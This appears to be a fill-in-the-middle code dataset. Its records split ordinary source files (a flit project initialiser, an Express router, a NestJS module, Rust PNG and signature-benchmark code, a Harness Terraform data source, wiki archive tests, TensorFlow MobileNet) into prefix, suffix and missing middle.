]
license_names_to_classifiers = {
'mit': 'License :: OSI Approved :: MIT License',
'gpl3': 'License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)',
'apache': 'License :: OSI Approved :: Apache Software License'
}
license_templates_dir = Path(__file__).parent / 'license_templates'
class IniterBase:
def __init__(self, directory='.'):
self.directory = Path(directory)
self.defaults = get_defaults()
def validate_email(self, s):
# Properly validating an email address is much more complex
return bool(re.match(r'.+@.+', s)) or s == ""
def validate_homepage(self, s):
return not s or s.startswith(('http://', 'https://'))
def guess_module_name(self):
packages, modules = [], []
for p in self.directory.iterdir():
if not p.stem.isidentifier():
continue
if p.is_dir() and (p / '__init__.py').is_file():
if p.name not in {'test', 'tests'}:
packages.append(p.name)
elif p.is_file() and p.suffix == '.py':
if p.stem not in {'setup'} and not p.name.startswith('test_'):
modules.append(p.stem)
src_dir = self.directory / 'src'
if src_dir.is_dir():
for p in src_dir.iterdir():
if not p.stem.isidentifier():
continue
if p.is_dir() and (p / '__init__.py').is_file():
if p.name not in {'test', 'tests'}:
packages.append(p.name)
elif p.is_file() and p.suffix == '.py':
if p.stem not in {'setup'} and not p.name.startswith('test_'):
modules.append(p.stem)
if len(packages) == 1:
return packages[0]
elif len(packages) == 0 and len(modules) == 1:
return modules[0]
else:
return None
def update_defaults(self, author, author_email, module, home_page, license):
new_defaults = {'author': author, 'author_email': author_email,
'license': license}
name_chunk_pat = r'\b{}\b'.format(re.escape(module))
if re.search(name_chunk_pat, home_page):
new_defaults['home_page_template'] = \
re.sub(name_chunk_pat, '{modulename}', home_page, flags=re.I)
if any(new_defaults[k] != self.defaults.get(k) for k in new_defaults):
self.defaults.update(new_defaults)
store_defaults(self.defaults)
def write_license(self, name, author):
if (self.directory / 'LICENSE').exists():
return
year = date.today().year
with (license_templates_dir / name).open(encoding='utf-8') as f:
license_text = f.read()
with (self.directory / 'LICENSE').open('w', encoding='utf-8') as f:
f.write(license_text.format(year=year, author=author))
class TerminalIniter(IniterBase):
def prompt_text(self, prompt, default, validator, retry_msg="Try again."):
if default is not None:
p = "{} [{}]: ".format(prompt, default)
else:
p = prompt + ': '
while True:
response = input(p)
if response == '' and default is not None:
response = default
if validator(response):
return response
print(retry_msg)
def prompt_options(self, prompt, options, default=None):
default_ix = None
print(prompt)
for i, (key, text) in enumerate(options, start=1):
print("{}. {}".format(i, text))
if key == default:
default_ix = i
while True:
p = "Enter 1-" + str(len(options))
if default_ix is not None:
p += ' [{}]'.format(default_ix)
response = input(p+': ')
if (default_ix is not None) and response == '':
return default
if response.isnumeric():
ir = int(response)
if 1 <= ir <= len(options):
return options[ir-1][0]
print("Try again.")
def | (self):
if (self.directory / 'pyproject.toml').exists():
resp = input("pyproject.toml exists - overwrite it? [y/N]: ")
if (not resp) or resp[0].lower() != 'y':
return
module = self.prompt_text('Module name', self.guess_module_name(),
str.isidentifier)
author = self.prompt_text('Author', self.defaults.get('author'),
lambda s: s != '')
author_email = self.prompt_text('Author email',
self.defaults.get('author_email'), self.validate_email)
if 'home_page_template' in self.defaults:
home_page_default = self.defaults['home_page_template'].replace(
'{modulename}', module)
else:
home_page_default = None
home_page = self.prompt_text('Home page', home_page_default, self.validate_homepage,
retry_msg="Should start with http:// or https:// - try again.")
license = self.prompt_options('Choose a license (see http://choosealicense.com/ for more info)',
license_choices, self.defaults.get('license'))
self.update_defaults(author=author, author_email=author_email,
home_page=home_page, module=module, license=license)
metadata = OrderedDict([
('module', module),
('author', author),
])
if author_email:
metadata['author-email'] = author_email
if home_page:
metadata['home-page'] = home_page
if license != 'skip':
metadata['classifiers'] = [license_names_to_classifiers[license]]
self.write_license(license, author)
with (self.directory / 'pyproject.toml').open('w', encoding='utf-8') as f:
f.write(TEMPLATE.format(metadata=toml.dumps(metadata)))
print()
print("Written pyproject.toml; edit that file to add optional extra info.")
TEMPLATE = """\
[build-system]
requires = ["flit_core >=2,<3"]
build-backend = "flit_core.buildapi"
[tool.flit.metadata]
{metadata}
"""
if __name__ == '__main__':
TerminalIniter().initialise()
| initialise |
product.js | const router = require("express").Router();
const { internalServerError } = require("../utils/response");
const ProductControllers = require("../controllers/product");
router.get(
"/all",
async (req, res) => {
try {
await ProductControllers.getAllProducts(req, res);
} catch (error) {
internalServerError(res, error);
}
}
);
router.get(
"/:productName",
async (req, res) => {
try {
await ProductControllers.getProduct(req, res);
} catch (error) {
internalServerError(res, error);
}
}
);
router.put("/",
async (req, res) => {
try {
await ProductControllers.createProduct(req, res);
} catch (error) {
internalServerError(res, error);
}
}
);
router.delete("/:productName",
async (req, res) => {
try {
await ProductControllers.deleteProduct(req, res);
} catch (error) { | }
}
);
module.exports = router; | internalServerError(res, error); |
app.module.ts | import { Module } from '@nestjs/common';
import { TasksModule } from './tasks/tasks.module';
@Module({
imports: [TasksModule],
})
export class | { }
| AppModule |
raster.rs | // PNG Pong
//
// Copyright © 2019-2021 Jeron Aldaron Lau
//
// Licensed under the Apache License, Version 2.0, <LICENSE-APACHE or
// https://apache.org/licenses/LICENSE-2.0>, or the Zlib License, <LICENSE-ZLIB
// or http://opensource.org/licenses/Zlib>, at your option. This file may not be
// copied, modified, or distributed except according to those terms.
use crate::chunk::{ColorType, ImageHeader};
use pix::{
chan::{Ch16, Ch8},
el::Pixel,
gray::{Gray8, SGray16, SGray8, SGraya16, SGraya8},
rgb::{SRgb16, SRgb8, SRgba16, SRgba8},
Palette, Raster,
};
/// A Raster of one of the PNG types (all are sRGB gamma).
/// PNGs with less than 8 bits per channel are scaled up to 8 bits per channel.
#[allow(missing_debug_implementations)]
pub enum PngRaster {
/// 1, 2, 4, 8-bit greyscale
Gray8(Raster<SGray8>),
/// 16-bit grayscale
Gray16(Raster<SGray16>),
/// 8-bit sRGB
Rgb8(Raster<SRgb8>),
/// 16-bit sRGB
Rgb16(Raster<SRgb16>),
/// 1, 2, 4, 8-bit sRGB(A) palette
Palette(Raster<Gray8>, Box<Palette>, Vec<u8>),
/// 8-bit grayscale with alpha
Graya8(Raster<SGraya8>),
/// 16-bit grayscale with alpha
Graya16(Raster<SGraya16>),
/// 8-bit sRGB with alpha
Rgba8(Raster<SRgba8>),
/// 16-bit sRGB with alpha
Rgba16(Raster<SRgba16>),
}
impl PngRaster {
pub(crate) fn header(&self, interlace: bool) -> ImageHeader {
use PngRaster::*;
match self {
Gray8(r) => ImageHeader {
width: r.width(),
height: r.height(),
color_type: ColorType::Grey,
bit_depth: 8,
interlace,
},
Gray16(r) => ImageHeader {
width: r.width(),
height: r.height(),
color_type: ColorType::Grey,
bit_depth: 16,
interlace,
},
Rgb8(r) => ImageHeader {
width: r.width(),
height: r.height(),
color_type: ColorType::Rgb,
bit_depth: 8,
interlace,
},
Rgb16(r) => ImageHeader {
width: r.width(),
height: r.height(),
color_type: ColorType::Rgb,
bit_depth: 16,
interlace,
},
Palette(r, _pal, _pa) => ImageHeader {
width: r.width(),
height: r.height(),
color_type: ColorType::Palette,
bit_depth: 8,
interlace,
},
Graya8(r) => ImageHeader {
width: r.width(),
height: r.height(),
color_type: ColorType::GreyAlpha,
bit_depth: 8,
interlace,
},
Graya16(r) => ImageHeader {
width: r.width(),
height: r.height(),
color_type: ColorType::GreyAlpha,
bit_depth: 16,
interlace,
},
Rgba8(r) => ImageHeader {
width: r.width(),
height: r.height(),
color_type: ColorType::Rgba,
bit_depth: 8,
interlace,
},
Rgba16(r) => ImageHeader {
width: r.width(),
height: r.height(),
color_type: ColorType::Rgba,
bit_depth: 16,
interlace,
},
}
}
}
impl<P: Pixel> From<PngRaster> for Raster<P> | fn from(raster: PngRaster) -> Raster<P> {
use PngRaster::*;
match raster {
Gray8(r) => Raster::with_raster(&r),
Gray16(r) => Raster::with_raster(&r),
Rgb8(r) => Raster::with_raster(&r),
Rgb16(r) => Raster::with_raster(&r),
Palette(raster, pal, pa) => {
let mut pixels = Vec::with_capacity(raster.pixels().len());
for pixel in raster.pixels() {
let i: u8 = pixel.one().into();
let i = i as usize;
let px: SRgb8 = pal.entry(i).unwrap();
let px = SRgba8::new(
px.one(),
px.two(),
px.three(),
Ch8::new(pa[i]),
);
pixels.push(px.convert());
}
Raster::with_pixels(raster.width(), raster.height(), pixels)
}
Graya8(r) => Raster::with_raster(&r),
Graya16(r) => Raster::with_raster(&r),
Rgba8(r) => Raster::with_raster(&r),
Rgba16(r) => Raster::with_raster(&r),
}
}
} | where
P::Chan: From<Ch8> + From<Ch16>,
{ |
data_source_current_user.go | package ng
import (
"context"
"github.com/harness-io/harness-go-sdk/harness/api"
"github.com/harness-io/harness-go-sdk/harness/nextgen"
"github.com/harness-io/terraform-provider-harness/internal/utils"
"github.com/hashicorp/terraform-plugin-sdk/v2/diag"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/schema"
)
func | () *schema.Resource {
return &schema.Resource{
Description: utils.GetNextgenDescription("Data source for retrieving the current user based on the API key."),
ReadContext: dataSourceCurrentUserRead,
Schema: map[string]*schema.Schema{
"uuid": {
Description: "Unique identifier of the user.",
Type: schema.TypeString,
Computed: true,
},
"name": {
Description: "Name of the user.",
Type: schema.TypeString,
Computed: true,
},
"email": {
Description: "Email address of the user.",
Type: schema.TypeString,
Computed: true,
},
"token": {
Description: "Token used to authenticate the user.",
Type: schema.TypeString,
Computed: true,
},
"default_account_id": {
Description: "Default account ID of the user.",
Type: schema.TypeString,
Computed: true,
},
"intent": {
Description: "Intent of the user.",
Type: schema.TypeString,
Computed: true,
},
"admin": {
Description: "Whether the user is an administrator.",
Type: schema.TypeBool,
Computed: true,
},
"2fa_enabled": {
Description: "Whether 2FA is enabled for the user.",
Type: schema.TypeBool,
Computed: true,
},
"email_verified": {
Description: "Whether the user's email address has been verified.",
Type: schema.TypeBool,
Computed: true,
},
"locked": {
Description: "Whether or not the user account is locked.",
Type: schema.TypeBool,
Computed: true,
},
"signup_action": {
Description: "Signup action of the user.",
Type: schema.TypeString,
Computed: true,
},
"edition": {
Description: "Edition of the platform being used.",
Type: schema.TypeString,
Computed: true,
},
"billing_frequency": {
Description: "Billing frequency of the user.",
Type: schema.TypeString,
Computed: true,
},
},
}
}
func dataSourceCurrentUserRead(ctx context.Context, d *schema.ResourceData, meta interface{}) diag.Diagnostics {
c := meta.(*api.Client)
resp, _, err := c.NGClient.UserApi.GetCurrentUserInfo(ctx)
if err != nil {
return diag.Errorf(err.(nextgen.GenericSwaggerError).Error())
}
user := resp.Data
d.SetId(user.Uuid)
d.Set("uuid", user.Uuid)
d.Set("name", user.Name)
d.Set("email", user.Email)
d.Set("token", user.Token)
d.Set("default_account_id", user.DefaultAccountId)
d.Set("intent", user.Intent)
d.Set("admin", user.Admin)
d.Set("2fa_enabled", user.TwoFactorAuthenticationEnabled)
d.Set("email_verified", user.EmailVerified)
d.Set("locked", user.Locked)
d.Set("signup_action", user.SignupAction)
d.Set("edition", user.Edition)
d.Set("billing_frequency", user.BillingFrequency)
return nil
}
| DataSourceCurrentUser |
__init__.py | from . import clans, databases, entries, proteins, proteomes, structures, taxa
from . import utils |
||
bench_ssk_ops.rs | use super::ff::Field;
use super::pairing::bls12_381::Fr;
use super::pixel::Pixel;
use super::pixel::PixelSignature;
use super::pixel::SubSecretKey;
use super::rand::Rng;
use super::rand_core::*;
use super::rand_xorshift::XorShiftRng;
use criterion::Criterion;
/// benchmark sub secret key delegation - without randomization
#[allow(dead_code)]
fn | (c: &mut Criterion) {
const SAMPLES: usize = 100;
// this benchmark uses a same set of parameter
let seed = rand::thread_rng()
.gen_ascii_chars()
.take(32)
.collect::<String>();
let param = Pixel::param_gen(&seed, 0).unwrap();
// ssklist at time 1
let mut ssklist: Vec<SubSecretKey> = vec![];
for _i in 0..SAMPLES {
let seed = rand::thread_rng()
.gen_ascii_chars()
.take(32)
.collect::<String>();
// generate a sk and store the first ssk
let (_, sk, _) = Pixel::key_gen(&seed, ¶m).unwrap();
ssklist.push(sk.first_ssk().unwrap());
}
// from root to the leaf we can delegate d - 1 times
for i in 0..param.depth() - 1 {
// clone ssk and param for benchmarking
let ssklist_clone = ssklist.clone();
let param_clone = param.clone();
let message = format!(
"ssk delegate from {} to {}",
ssklist_clone[i].time(),
ssklist_clone[i].time() + 1
);
// benchmark ssk update
c.bench_function(&message, move |b| {
let mut counter = 0;
b.iter(|| {
let mut ssknew = ssklist_clone[counter].clone();
let tar_time = ssknew.time() + 1;
let res = ssknew.delegate(tar_time, param_clone.depth());
assert!(res.is_ok(), res.err());
counter = (counter + 1) % SAMPLES;
})
});
// update ssk to next time stamp
for e in ssklist.iter_mut().take(SAMPLES) {
let tar_time = e.time() + 1;
let res = e.delegate(tar_time, param.depth());
assert!(res.is_ok(), res.err());
}
}
}
/// benchmark sub secret key randomization
#[allow(dead_code)]
fn bench_ssk_leveled_randomization(c: &mut Criterion) {
// this benchmark uses a same set of parameter
let seed = rand::thread_rng()
.gen_ascii_chars()
.take(32)
.collect::<String>();
let param = Pixel::param_gen(&seed, 0).unwrap();
// ssk at time 1
let seed = rand::thread_rng()
.gen_ascii_chars()
.take(32)
.collect::<String>();
// generate a sk and store the first ssk
let (_, sk, _) = Pixel::key_gen(&seed, ¶m).unwrap();
let mut ssk = sk.first_ssk().unwrap();
// from root to the leaf we can delegate d - 1 times
for _ in 0..param.depth() - 1 {
// clone ssk and param for benchmarking
let ssk_clone = ssk.clone();
let param_clone = param.clone();
let message = format!("ssk randomization at time {}", ssk_clone.time(),);
// benchmark ssk randomization
c.bench_function(&message, move |b| {
b.iter(|| {
let mut ssknew = ssk_clone.clone();
let r = Fr::random(&mut XorShiftRng::from_seed([
0x59, 0x62, 0xbe, 0x5d, 0x76, 0x3d, 0x31, 0x8d, 0x17, 0xdb, 0x37, 0x32, 0x54,
0x06, 0xbc, 0xe5,
]));
let res = ssknew.randomization(¶m_clone, r);
assert!(res.is_ok(), res.err());
})
});
// update ssk to next time stamp
let tar_time = ssk.time() + 1;
let res = ssk.delegate(tar_time, param.depth());
assert!(res.is_ok(), res.err());
}
}
/// benchmark sub secret key randomization
#[allow(dead_code)]
fn bench_ssk_leaf_randomization(c: &mut Criterion) {
// this benchmark uses a same set of parameter
let seed = rand::thread_rng()
.gen_ascii_chars()
.take(32)
.collect::<String>();
let param = Pixel::param_gen(&seed, 0).unwrap();
// ssk at time 1
let seed = rand::thread_rng()
.gen_ascii_chars()
.take(32)
.collect::<String>();
// generate a sk and store the first ssk
let (_, sk, _) = Pixel::key_gen(&seed, ¶m).unwrap();
let mut ssk = sk.first_ssk().unwrap();
// update ssk to a leaf node
let tar_time = param.depth() as u64;
let res = ssk.delegate(tar_time, param.depth());
assert!(res.is_ok(), res.err());
// clone ssk and param for benchmarking
let message = format!("ssk randomization at time {}", ssk.time(),);
// benchmark ssk randomization
c.bench_function(&message, move |b| {
b.iter(|| {
//let mut ssknew = ssk_clone.clone();
let r = Fr::random(&mut XorShiftRng::from_seed([
0x59, 0x62, 0xbe, 0x5d, 0x76, 0x3d, 0x31, 0x8d, 0x17, 0xdb, 0x37, 0x32, 0x54, 0x06,
0xbc, 0xe5,
]));
let res = ssk.randomization(¶m, r);
assert!(res.is_ok(), res.err());
})
});
}
criterion_group!(ssk_ops, bench_ssk_leaf_randomization, bench_ssk_delegate);
criterion_group!(ssk_ops_slow, bench_ssk_leveled_randomization);
| bench_ssk_delegate |
archive_test.py | import unittest
from datetime import datetime
import archive
class TestArchive(unittest.TestCase):
"""
Various unit tests for wiki.web.archive
Lucas Combs
April 2019
"""
def test_remove_file_extension(self):
"""
Verify that the file extension is removed.
"""
file = "readme.md"
self.assertEqual("readme", archive.remove_file_extension(file))
def test_get_file_extension(self):
"""
Verify that only the file extension is returned.
"""
file = "notes.txt"
self.assertEqual(".txt", archive.get_file_extension(file))
def test_normal_get_page_url_from_path(self):
"""
Verify that the generated URL is correct. The path on disk is different from the wiki URL.
"""
content = "content"
path = "%s\\home.md" % content
self.assertEqual("home", archive.get_page_url_from_path(path, content))
def test_bad_get_page_url_from_path(self):
"""
This is an edge case where the base directory is not present in the path.
In the event that this is not handled, we will have an infinite loop. (Web page will never load)
"""
path = "content\\home.md"
self.assertEqual("content\\home", archive.get_page_url_from_path(path, "INVALID PATH"))
def test_is_archived_page(self):
"""
Test that a page with an /archive/ directory in it's path is considered to be an archived page.
"""
_archive = "archive"
class MockPage: | path = "content\\stuff\\%s\\test.md" % _archive
self.assertTrue(archive.is_archived_page(MockPage(), _archive))
def test_get_timestamped_file_name(self):
"""
Verify that a timestamped file name:
1.) Doesn't contain the original file name
* get_timestamped_file_name(readme.md) does not contain "readme"
2.) Has the same file extension
* get_timestamped_file_name(readme.md) ends with ".md"
3.) Contains the current year
* example: 2019
"""
file = "readme"
ext = ".md"
name = archive.get_timestamped_file_name(file + ext)
# Shouldn't contain actual name of file
self.assertFalse(name.__contains__(file))
# Should have the same file extension
self.assertTrue(name.endswith(ext))
# Should contain the year
self.assertTrue(name.__contains__(datetime.now().year.__str__()))
def test_get_file_archive_dir(self):
"""
Verify that a pages archive directory as follows:
Path to *P*: /staff/welcome
Archive path for *P*: /staff/archive/welcome
"""
path = "\\content\\info\\welcome.md"
self.assertEqual("\\content\\info\\%s\\welcome" % archive.ARCHIVE_FOLDER, archive.get_file_archive_dir(path))
if __name__ == '__main__':
unittest.main() | |
mobilenet.py | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Mobilenet Base Class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import contextlib
import copy
import os
import tensorflow as tf
slim = tf.contrib.slim
@slim.add_arg_scope
def apply_activation(x, name=None, activation_fn=None):
return activation_fn(x, name=name) if activation_fn else x
def _fixed_padding(inputs, kernel_size, rate=1):
"""Pads the input along the spatial dimensions independently of input size.
Pads the input such that if it was used in a convolution with 'VALID' padding,
the output would have the same dimensions as if the unpadded input was used
in a convolution with 'SAME' padding.
Args:
inputs: A tensor of size [batch, height_in, width_in, channels].
kernel_size: The kernel to be used in the conv2d or max_pool2d operation.
rate: An integer, rate for atrous convolution.
Returns:
output: A tensor of size [batch, height_out, width_out, channels] with the
input, either intact (if kernel_size == 1) or padded (if kernel_size > 1).
"""
kernel_size_effective = [kernel_size[0] + (kernel_size[0] - 1) * (rate - 1),
kernel_size[0] + (kernel_size[0] - 1) * (rate - 1)]
pad_total = [kernel_size_effective[0] - 1, kernel_size_effective[1] - 1]
pad_beg = [pad_total[0] // 2, pad_total[1] // 2]
pad_end = [pad_total[0] - pad_beg[0], pad_total[1] - pad_beg[1]]
padded_inputs = tf.pad(inputs, [[0, 0], [pad_beg[0], pad_end[0]],
[pad_beg[1], pad_end[1]], [0, 0]])
return padded_inputs
def _make_divisible(v, divisor, min_value=None):
if min_value is None:
min_value = divisor
new_v = max(min_value, int(v + divisor / 2) // divisor * divisor)
# Make sure that round down does not go down by more than 10%.
if new_v < 0.9 * v:
new_v += divisor
return new_v
@contextlib.contextmanager
def _set_arg_scope_defaults(defaults):
"""Sets arg scope defaults for all items present in defaults.
Args:
defaults: dictionary/list of pairs, containing a mapping from
function to a dictionary of default args.
Yields:
context manager where all defaults are set.
"""
if hasattr(defaults, 'items'):
items = list(defaults.items())
else:
items = defaults
if not items:
yield
else:
func, default_arg = items[0]
with slim.arg_scope(func, **default_arg):
with _set_arg_scope_defaults(items[1:]):
yield
@slim.add_arg_scope
def depth_multiplier(output_params,
multiplier,
divisible_by=8,
min_depth=8,
**unused_kwargs):
if 'num_outputs' not in output_params:
return
d = output_params['num_outputs']
output_params['num_outputs'] = _make_divisible(d * multiplier, divisible_by,
min_depth)
_Op = collections.namedtuple('Op', ['op', 'params', 'multiplier_func'])
def op(opfunc, **params):
|
class NoOpScope(object):
"""No-op context manager."""
def __enter__(self):
return None
def __exit__(self, exc_type, exc_value, traceback):
return False
def safe_arg_scope(funcs, **kwargs):
"""Returns `slim.arg_scope` with all None arguments removed.
Arguments:
funcs: Functions to pass to `arg_scope`.
**kwargs: Arguments to pass to `arg_scope`.
Returns:
arg_scope or No-op context manager.
Note: can be useful if None value should be interpreted as "do not overwrite
this parameter value".
"""
filtered_args = {name: value for name, value in kwargs.items()
if value is not None}
if filtered_args:
return slim.arg_scope(funcs, **filtered_args)
else:
return NoOpScope()
@slim.add_arg_scope
def mobilenet_base( # pylint: disable=invalid-name
inputs,
conv_defs,
multiplier=1.0,
final_endpoint=None,
output_stride=None,
use_explicit_padding=False,
scope=None,
is_training=False):
"""Mobilenet base network.
Constructs a network from inputs to the given final endpoint. By default
the network is constructed in inference mode. To create network
in training mode use:
with slim.arg_scope(mobilenet.training_scope()):
logits, endpoints = mobilenet_base(...)
Args:
inputs: a tensor of shape [batch_size, height, width, channels].
conv_defs: A list of op(...) layers specifying the net architecture.
multiplier: Float multiplier for the depth (number of channels)
for all convolution ops. The value must be greater than zero. Typical
usage will be to set this value in (0, 1) to reduce the number of
parameters or computation cost of the model.
final_endpoint: The name of last layer, for early termination for
for V1-based networks: last layer is "layer_14", for V2: "layer_20"
output_stride: An integer that specifies the requested ratio of input to
output spatial resolution. If not None, then we invoke atrous convolution
if necessary to prevent the network from reducing the spatial resolution
of the activation maps. Allowed values are 1 or any even number, excluding
zero. Typical values are 8 (accurate fully convolutional mode), 16
(fast fully convolutional mode), and 32 (classification mode).
NOTE- output_stride relies on all consequent operators to support dilated
operators via "rate" parameter. This might require wrapping non-conv
operators to operate properly.
use_explicit_padding: Use 'VALID' padding for convolutions, but prepad
inputs so that the output dimensions are the same as if 'SAME' padding
were used.
scope: optional variable scope.
is_training: How to setup batch_norm and other ops. Note: most of the time
this does not need be set directly. Use mobilenet.training_scope() to set
up training instead. This parameter is here for backward compatibility
only. It is safe to set it to the value matching
training_scope(is_training=...). It is also safe to explicitly set
it to False, even if there is outer training_scope set to to training.
(The network will be built in inference mode). If this is set to None,
no arg_scope is added for slim.batch_norm's is_training parameter.
Returns:
tensor_out: output tensor.
end_points: a set of activations for external use, for example summaries or
losses.
Raises:
ValueError: depth_multiplier <= 0, or the target output_stride is not
allowed.
"""
if multiplier <= 0:
raise ValueError('multiplier is not greater than zero.')
# Set conv defs defaults and overrides.
conv_defs_defaults = conv_defs.get('defaults', {})
conv_defs_overrides = conv_defs.get('overrides', {})
if use_explicit_padding:
conv_defs_overrides = copy.deepcopy(conv_defs_overrides)
conv_defs_overrides[
(slim.conv2d, slim.separable_conv2d)] = {'padding': 'VALID'}
if output_stride is not None:
if output_stride == 0 or (output_stride > 1 and output_stride % 2):
raise ValueError('Output stride must be None, 1 or a multiple of 2.')
# a) Set the tensorflow scope
# b) set padding to default: note we might consider removing this
# since it is also set by mobilenet_scope
# c) set all defaults
# d) set all extra overrides.
with _scope_all(scope, default_scope='Mobilenet'), \
safe_arg_scope([slim.batch_norm], is_training=is_training), \
_set_arg_scope_defaults(conv_defs_defaults), \
_set_arg_scope_defaults(conv_defs_overrides):
# The current_stride variable keeps track of the output stride of the
# activations, i.e., the running product of convolution strides up to the
# current network layer. This allows us to invoke atrous convolution
# whenever applying the next convolution would result in the activations
# having output stride larger than the target output_stride.
current_stride = 1
# The atrous convolution rate parameter.
rate = 1
net = inputs
# Insert default parameters before the base scope which includes
# any custom overrides set in mobilenet.
end_points = {}
scopes = {}
for i, opdef in enumerate(conv_defs['spec']):
params = dict(opdef.params)
opdef.multiplier_func(params, multiplier)
stride = params.get('stride', 1)
if output_stride is not None and current_stride == output_stride:
# If we have reached the target output_stride, then we need to employ
# atrous convolution with stride=1 and multiply the atrous rate by the
# current unit's stride for use in subsequent layers.
layer_stride = 1
layer_rate = rate
rate *= stride
else:
layer_stride = stride
layer_rate = 1
current_stride *= stride
# Update params.
params['stride'] = layer_stride
# Only insert rate to params if rate > 1.
if layer_rate > 1:
params['rate'] = layer_rate
# Set padding
if use_explicit_padding:
if 'kernel_size' in params:
net = _fixed_padding(net, params['kernel_size'], layer_rate)
else:
params['use_explicit_padding'] = True
end_point = 'layer_%d' % (i + 1)
try:
net = opdef.op(net, **params)
except Exception:
print('Failed to create op %i: %r params: %r' % (i, opdef, params))
raise
end_points[end_point] = net
scope = os.path.dirname(net.name)
scopes[scope] = end_point
if final_endpoint is not None and end_point == final_endpoint:
break
# Add all tensors that end with 'output' to
# endpoints
for t in net.graph.get_operations():
scope = os.path.dirname(t.name)
bn = os.path.basename(t.name)
if scope in scopes and t.name.endswith('output'):
end_points[scopes[scope] + '/' + bn] = t.outputs[0]
return net, end_points
@contextlib.contextmanager
def _scope_all(scope, default_scope=None):
with tf.variable_scope(scope, default_name=default_scope) as s,\
tf.name_scope(s.original_name_scope):
yield s
@slim.add_arg_scope
def mobilenet(inputs,
num_classes=1001,
prediction_fn=slim.softmax,
reuse=None,
scope='Mobilenet',
base_only=False,
**mobilenet_args):
"""Mobilenet model for classification, supports both V1 and V2.
Note: default mode is inference, use mobilenet.training_scope to create
training network.
Args:
inputs: a tensor of shape [batch_size, height, width, channels].
num_classes: number of predicted classes. If 0 or None, the logits layer
is omitted and the input features to the logits layer (before dropout)
are returned instead.
prediction_fn: a function to get predictions out of logits
(default softmax).
reuse: whether or not the network and its variables should be reused. To be
able to reuse 'scope' must be given.
scope: Optional variable_scope.
base_only: if True will only create the base of the network (no pooling
and no logits).
**mobilenet_args: passed to mobilenet_base verbatim.
- conv_defs: list of conv defs
- multiplier: Float multiplier for the depth (number of channels)
for all convolution ops. The value must be greater than zero. Typical
usage will be to set this value in (0, 1) to reduce the number of
parameters or computation cost of the model.
- output_stride: will ensure that the last layer has at most total stride.
If the architecture calls for more stride than that provided
(e.g. output_stride=16, but the architecture has 5 stride=2 operators),
it will replace output_stride with fractional convolutions using Atrous
Convolutions.
Returns:
logits: the pre-softmax activations, a tensor of size
[batch_size, num_classes]
end_points: a dictionary from components of the network to the corresponding
activation tensor.
Raises:
ValueError: Input rank is invalid.
"""
is_training = mobilenet_args.get('is_training', False)
input_shape = inputs.get_shape().as_list()
if len(input_shape) != 4:
raise ValueError('Expected rank 4 input, was: %d' % len(input_shape))
with tf.variable_scope(scope, 'Mobilenet', reuse=reuse) as scope:
inputs = tf.identity(inputs, 'input')
net, end_points = mobilenet_base(inputs, scope=scope, **mobilenet_args)
if base_only:
return net, end_points
net = tf.identity(net, name='embedding')
with tf.variable_scope('Logits'):
net = global_pool(net)
end_points['global_pool'] = net
if not num_classes:
return net, end_points
net = slim.dropout(net, scope='Dropout', is_training=is_training)
# 1 x 1 x num_classes
# Note: legacy scope name.
logits = slim.conv2d(
net,
num_classes, [1, 1],
activation_fn=None,
normalizer_fn=None,
biases_initializer=tf.zeros_initializer(),
scope='Conv2d_1c_1x1')
logits = tf.squeeze(logits, [1, 2])
logits = tf.identity(logits, name='output')
end_points['Logits'] = logits
if prediction_fn:
end_points['Predictions'] = prediction_fn(logits, 'Predictions')
return logits, end_points
def global_pool(input_tensor, pool_op=tf.nn.avg_pool):
"""Applies avg pool to produce 1x1 output.
NOTE: This function is funcitonally equivalenet to reduce_mean, but it has
baked in average pool which has better support across hardware.
Args:
input_tensor: input tensor
pool_op: pooling op (avg pool is default)
Returns:
a tensor batch_size x 1 x 1 x depth.
"""
shape = input_tensor.get_shape().as_list()
if shape[1] is None or shape[2] is None:
kernel_size = tf.convert_to_tensor(
[1, tf.shape(input_tensor)[1],
tf.shape(input_tensor)[2], 1])
else:
kernel_size = [1, shape[1], shape[2], 1]
output = pool_op(
input_tensor, ksize=kernel_size, strides=[1, 1, 1, 1], padding='VALID')
# Recover output shape, for unknown shape.
output.set_shape([None, 1, 1, None])
return output
def training_scope(is_training=True,
weight_decay=0.00004,
stddev=0.09,
dropout_keep_prob=0.8,
bn_decay=0.997):
"""Defines Mobilenet training scope.
Usage:
with tf.contrib.slim.arg_scope(mobilenet.training_scope()):
logits, endpoints = mobilenet_v2.mobilenet(input_tensor)
# the network created will be trainble with dropout/batch norm
# initialized appropriately.
Args:
is_training: if set to False this will ensure that all customizations are
set to non-training mode. This might be helpful for code that is reused
across both training/evaluation, but most of the time training_scope with
value False is not needed. If this is set to None, the parameters is not
added to the batch_norm arg_scope.
weight_decay: The weight decay to use for regularizing the model.
stddev: Standard deviation for initialization, if negative uses xavier.
dropout_keep_prob: dropout keep probability (not set if equals to None).
bn_decay: decay for the batch norm moving averages (not set if equals to
None).
Returns:
An argument scope to use via arg_scope.
"""
# Note: do not introduce parameters that would change the inference
# model here (for example whether to use bias), modify conv_def instead.
batch_norm_params = {
'decay': bn_decay,
'is_training': is_training
}
if stddev < 0:
weight_intitializer = slim.initializers.xavier_initializer()
else:
weight_intitializer = tf.truncated_normal_initializer(stddev=stddev)
# Set weight_decay for weights in Conv and FC layers.
with slim.arg_scope(
[slim.conv2d, slim.fully_connected, slim.separable_conv2d],
weights_initializer=weight_intitializer,
normalizer_fn=slim.batch_norm), \
slim.arg_scope([mobilenet_base, mobilenet], is_training=is_training),\
safe_arg_scope([slim.batch_norm], **batch_norm_params), \
safe_arg_scope([slim.dropout], is_training=is_training,
keep_prob=dropout_keep_prob), \
slim.arg_scope([slim.conv2d], \
weights_regularizer=slim.l2_regularizer(weight_decay)), \
slim.arg_scope([slim.separable_conv2d], weights_regularizer=None) as s:
return s
| multiplier = params.pop('multiplier_transorm', depth_multiplier)
return _Op(opfunc, params=params, multiplier_func=multiplier) |
dst-tuple.rs | // run-pass
#![allow(type_alias_bounds)]
#![feature(box_syntax)]
#![feature(unsized_tuple_coercion)]
